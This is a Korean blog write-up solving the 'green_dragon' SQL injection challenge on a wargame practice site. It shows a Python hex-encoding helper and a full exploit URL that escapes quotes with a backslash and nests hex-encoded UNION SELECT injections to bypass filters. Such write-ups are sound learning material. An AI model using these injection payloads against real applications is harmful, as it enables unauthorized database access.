반응형
분석
이번 문제는 논리적 우회를 해야하는거 같은데..
id, pw 받고 따옴표 막혀있습니다.
그리고 입력 외에 result 된 id, pw에서도 preg_match를 적용합니다.
아무거나 넣어봅시다.
뭔가
이렇게 적으면 따옴표 우회가 될거같은 느낌인데.
여태 따옴표 우회를 hex로 했으니..
근데 이거 왜 안되징
db에 admin이 없나...???
그러면 union select로 admin을 어디선가 가져와야 할 텐데요
그냥 추가해도 될거같기도 하고
대충 아무거나 추가해보니까 query2 부분이 나옵니다.
아니 id는 admin이 맞기는 한데
아하
sqli 해서 나온 result를 sqli 해야하는구나
풀이
그럼 이제부터 또 query2 부분을 hex로 sqli 해봅시다.
payload = input('input string make hex :')
res = '0x'
for i in payload :
res += hex(ord(i))[2:]
print(res)이렇게 간단하게 만들어서
이렇게 쓰는데
뭐야 왜 안돼
아 query2는 id만 받는구나
https://los.rubiya.kr/chall/green_dragon_74d944f888fd3f9cf76e4e230e78c45b.php?id=\&pw=%20and%20pw=0x41%20union%20select%200x5c,%200x20616e642070773d3078343120756e696f6e2073656c6563742030783631363436643639366523%23
오.. 빡세다
반응형
